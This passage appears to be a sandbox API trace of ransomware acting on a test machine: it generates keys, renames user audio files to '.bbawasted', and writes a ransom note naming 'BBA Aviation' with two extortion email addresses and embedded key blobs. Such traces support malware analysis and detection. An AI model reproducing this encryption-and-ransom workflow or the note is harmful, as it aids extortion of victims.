out: hHeap=0x660000) returned 1 [0221.868] CloseHandle (hObject=0x290) returned 1 [0221.868] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0221.868] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0858 | out: hHeap=0x660000) returned 1 [0221.869] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6020) returned 1 [0221.869] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0221.869] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0221.869] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\UFhbIsdU85xq502BMCop.m4a") returned 158 [0221.869] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x346) returned 0x6c4b88 [0221.870] lstrcpyW (in: lpString1=0x6c4cc4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0221.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.870] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6a38) returned 1 [0221.870] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0221.870] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0221.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\UFhbIsdU85xq502BMCop.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\ufhbisdu85xq502bmcop.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0222.218] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.219] SetEndOfFile (hFile=0x290) returned 1 [0222.219] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0222.220] lstrcpyW (in: lpString1=0x6c4cc4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\UFhbIsdU85xq502BMCop.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\ufhbisdu85xq502bmcop.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\UFhbIsdU85xq502BMCop.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\ufhbisdu85xq502bmcop.m4a.bbawasted")) returned 1 [0222.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\UFhbIsdU85xq502BMCop.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\ufhbisdu85xq502bmcop.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0222.221] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0222.221] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x10233 [0222.222] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10233) returned 0x5f0000 [0222.222] CloseHandle (hObject=0x288) returned 1 [0222.225] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.226] CloseHandle (hObject=0x27c) returned 1 [0222.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0222.227] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6130) returned 1 [0222.227] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0222.227] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0222.228] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a62c8) returned 1 [0222.228] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0222.228] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0222.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0222.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0222.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0222.240] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CKIoqjUscU3I4InzUwxQsB76X/DQPMwlvOJua9k2Ac25hP/93x6D76ClCpqxgYBS\r\n+vmjiOXIg/G1On4UtFqtYQTh0LLRM5/eU16nafOplKeqb9RKilFENDzNWFlbYWAt\r\nowU8GojnRrK8bItZTADlxzPXQPTsEeuadV+eFRjvwl2LG6Xnj0o6RLfcmsrGlT7j\r\n2yLuIiwKrV/QqvvTv67Q+UDXcQd067ouyTJttoG7/iTiVMBkeVagp0Pj6tAIAMgG\r\nkwv2TfKETudTqg6/ugEGcaAqQF9vcUYVxgEP+Kzrj4YGdS0wQ7Fy+qKwlvpK18wN\r\nWNWx9KguLVuz2hwh2xVdYuP17b0IojZEw9kRa5hvIv7tG2xmaJRGYad8nLv59QfJ\r\nBWkwj+t/J1MmNo8ac2QXp0ucvUejMZKfEo/t807vXf3nI29Gt4vHE4hVouIDlhSg\r\nJ0D3sdRDW2bV2oYE83sgZ6S9FJsUBUkVZg8XjjYFwbfS1uV2B1c4U406N3x9lcHP\r\nH2kv8nX55bkrPThhsS0CiGo1x9t6iFQe8kCv2k8lSMX7/+bvwDkmFPDXal64qXgL\r\nAYIELfxDFEdS/qok+McK6ftz29jN3B6onyUhN4a1wTw9mIWmHh5DIZ034wjEFnhX\r\nayPja1pmWnZqlIY5LdxLEwWtDQnLZQd/GgaQfUnOeSz=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0222.240] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0222.241] SetEndOfFile (hFile=0x290) returned 1 [0222.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0222.243] CloseHandle (hObject=0x290) returned 1 [0222.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0222.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c09e0 | out: hHeap=0x660000) returned 1 [0222.244] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6350) returned 1 [0222.245] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0222.245] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0222.245] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\y40XfnfVMjV_4 s92g.m4a") returned 118 [0222.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2f6) returned 0x6c0858 [0222.245] lstrcpyW (in: lpString1=0x6c0944, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.245] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0222.245] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6020) returned 1 [0222.246] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0222.246] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0222.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\y40XfnfVMjV_4 s92g.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\y40xfnfvmjv_4 s92g.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0222.246] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.248] SetEndOfFile (hFile=0x290) returned 1 [0222.250] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0222.250] lstrcpyW (in: lpString1=0x6c0944, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\y40XfnfVMjV_4 s92g.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\y40xfnfvmjv_4 s92g.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\y40XfnfVMjV_4 s92g.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\y40xfnfvmjv_4 s92g.m4a.bbawasted")) returned 1 [0222.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\y40XfnfVMjV_4 s92g.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\y40xfnfvmjv_4 s92g.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0222.252] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0222.253] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa5c [0222.253] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa5c) returned 0x5f0000 [0222.253] CloseHandle (hObject=0x27c) returned 1 [0222.254] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.254] CloseHandle (hObject=0x288) returned 1 [0222.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0222.254] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0222.255] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0222.255] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0222.255] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0222.255] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0222.255] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0222.464] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0222.464] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0222.464] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0222.464] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]IkpCuqNX5S1OdHbAv+5tGCODmGdYIX5ltPYE/lfyrsIcNqHHagZe2BMD7v1nGdrP\r\nQtXayofDe0vSYjpZ6li9gB/cNpiSYeNvCA0kZ1SW4+HKSFwnCU0ijAG9I0lgMRMd\r\n973QyopAAT8fRRS0bTJ2yPT5pTLEZ/5tBHi46MqwZG+xxv6hGlZFXPnSjKV/1oIB\r\nn8lCyFUGVzsogMVVmJ+y5XCp9iWrAz3of7MW6lWE2jKQqXjOlhbFelFuWhLx7RC1\r\nBCnkj5uHFQXIbpI/rVRdI9KijifnmDAhPovlbh7NSkXtgGRSnPKvczlc29n5b69H\r\nXf8f+gxXodlFfy6Hvh2m3MpWRBYgKwV6+XERzyKoMh/NJseFBEA//rFC71r///Ph\r\nLxmxbaIx3Ay9748ExJvF18WUD0yfDoht53zXBVX9/5m2pt+JA1XywBWq3/aMc+ov\r\nyjH5b866vHri2a7Z29G9H+cVwvF1h+La8vqO4PxUr29Sx9YW9tHkWNLWiY1SdnrJ\r\nIMZ3HsZQmzvbdzyFYgayPWDWps97rrHHbwq0kZNw7yx48X2w2oLsQ8CaxGwuNm8z\r\nDVt0ZJ76SrgqAVM72p9HweDp2tf9I4CDykypqKRT9oiFXXDQdTHxkdg4bLEoXHHk\r\noEcnz1wGxz6ULiL+xMFlzAbfaUFjLDy1OZ0g3IJXU6J=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.464] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0222.464] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0222.465] SetEndOfFile (hFile=0x290) returned 1 [0222.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0222.468] CloseHandle (hObject=0x290) returned 1 [0222.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0858 | out: hHeap=0x660000) returned 1 [0222.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bca90 | out: hHeap=0x660000) returned 1 [0222.469] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0222.469] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0222.469] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0222.470] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\Oz7wWGYG0q 1.wav") returned 81 [0222.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ac) returned 0x6bc8e0 [0222.470] lstrcpyW (in: lpString1=0x6bc982, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.470] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5e88) returned 1 [0222.471] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0222.471] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0222.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\Oz7wWGYG0q 1.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\oz7wwgyg0q 1.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0222.472] WriteFile (in: hFile=0x290, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.474] SetEndOfFile (hFile=0x290) returned 1 [0222.474] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.474] lstrcpyW (in: lpString1=0x6bc982, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\Oz7wWGYG0q 1.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\oz7wwgyg0q 1.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\Oz7wWGYG0q 1.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\oz7wwgyg0q 1.wav.bbawasted")) returned 1 [0222.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\Oz7wWGYG0q 1.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\oz7wwgyg0q 1.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0222.476] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0222.476] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa115 [0222.476] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa115) returned 0x5f0000 [0222.477] CloseHandle (hObject=0x288) returned 1 [0222.479] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.480] CloseHandle (hObject=0x27c) returned 1 [0222.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0222.480] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0222.480] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0222.480] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0222.481] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6d68) returned 1 [0222.481] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0222.481] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0222.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0222.493] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0222.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.493] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]j4M93oP7xQfOjbsu+YNmDp0zyPGy0+x8wSBqW+np0XL+Fy/5b1srXRXmGELSODxb\r\nG9SvpQgQBYHTmSE3jcBGFnIng35O9jWoap69aIE94c5v7js6dOzg7dmGYp3jqCAh\r\noxPr75TEj1LylIgPq1ZTz1bCqHdQsZtbvqBDn6f1IGgmUBnEj92kkPa03VVZxbKT\r\ndhJVcfH771x9974ATxMe1oGTqYAGm5Z2eYgE+aM4iHk0YXr6xxnE3dXW7uhfqLgs\r\nva5y8E+ejrRxH8XGtOyLJGIfTMJb2DKb+P8itJYZ4cACvMLyyjxlI/9AiDjYkap/\r\nXHb6pJydWNIkF4qyo3RaMTdALHic7wZiWW2M0ITtAep/2tqoyjX/3XATJYPErTU5\r\nbMWHlGbMMn1fuWtcTPep+uiHk2T78Ke9eEjqXDQ5kxXd3BreopGTljs0kjmRzRF8\r\n8S54S+0mZTN7v85zOGuxlb+aEQSFbmTEWAqrlDkZDuHxiNHWx2i1F7K9VyC96Yxb\r\nuVrnyJLRuZQNpx/htfgmbjhpyqa72vR5YCy/1jtv97IYeYk0MnmknST4EN3OONOG\r\njAq843HabfzmbP4YQ2S2i75nLIAAHkzUHB9gVexBFYBLRk2Q8PY5LWlH+Ibw9med\r\nm0Jw4CSkJtnNfwtwJ9m+wFE9